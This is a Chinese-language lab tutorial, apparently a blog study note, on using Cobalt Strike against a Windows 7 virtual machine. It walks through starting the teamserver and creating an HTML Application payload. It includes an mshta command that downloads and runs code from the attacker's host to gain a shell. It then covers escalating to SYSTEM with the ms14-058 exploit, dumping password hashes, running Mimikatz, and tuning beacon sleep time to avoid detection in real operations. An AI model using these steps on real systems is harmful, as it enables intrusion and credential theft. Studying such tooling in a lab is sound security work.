CobaltStrike系列學習筆記——(二)提權
實驗環境 | 系統 | IP地址 |
---|---|---|
CobaltStrike(服務器/客戶端) | kali | 192.168.134.130 |
靶機 | win7 | 192.168.134.135 |
先來回顧上一節的內容
進入目錄:
root@kali:~#cd cobaltstrike3.14/
啓動服務器:
root@kali:~/cobaltstrike3.14#./teamserver 192.168.134.130 limbo
啓動客戶端:
root@kali:~/cobaltstrike3.14#java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
選擇攻擊的web驅動方式(這裏採用主機文件的方式):
Attacks->Packages->HTML Application
選擇攻擊的web驅動方式(這裏採用主機文件的方式):
Attacks->Web Drive-by->Host File
靶機使用cmd命令行執行如下命令:
mshta http://192.168.134.130:80/download/file.ext
這裏我們已經拿到shell,右鍵,點擊Interact打開交互:
首先執行sleep 1
,
然後再執行其他命令試試看,回顯速度快多了。
在Cobalt Strike中它的心跳默認是60s,默認60s一次回傳,這使得我們執行的命令響應很慢,爲了提高實驗效率,我們把間隔時間降低一點。但是在實戰時應根據實戰環境來調節,sleep時間太短會使得流量特徵過於明顯,容易暴露自己。
這裏我們再瞭解一下其他幾個選項:
Interact 打開beacon
Access
dumphashes 獲取hash
Elevate 提權
GoldenTicket 生成黃金票據注入當前會話
MAketoken 憑證轉換
RunMimikatz 運行Mimikatz
SpawnAs 用其他用戶生成CobaltStrike偵聽器
Explore
BrowserPivot 劫持目標瀏覽器進程
Desktop(VNC) 桌面交互
FileBrowser 文件瀏覽器
NetView 命令Net View
Portscan 端口掃描
Processlist 進程列表
Screenshot截圖
Pivoting
SOCKSServer 代理服務
Listener 反向端口轉發
DeployVPN 部署VPN
Spawn
新的通訊模式並生成會話
Session 會話管理
備註,刪除,心跳時間,退出
對於以上選項有了基本的瞭解後,我們來試試獲取hash:選中會話,右鍵->Access->Dump Hashes
可以看到權限不夠,報錯。
同樣,右鍵->Access->Run Mimikatz也報錯。
使用CobaltStrike提權:右鍵->Access->Elevate
選擇exp,這裏使用ms14-058
點擊Launch,成功後可以看到兩個會話,一個是test,一個是SYSTEM,如下圖所示:
此時在日誌中可以也看到已經拿到system權限了:
現在我們再試試,選中新的session(SYSTEM):
獲取hash:右鍵->Access->Dump Hashes
運行Mimikatz:運行右鍵->Access->Run Mimikatz
點擊View->Credentials
可以看到所有已經獲取的用戶主機hash: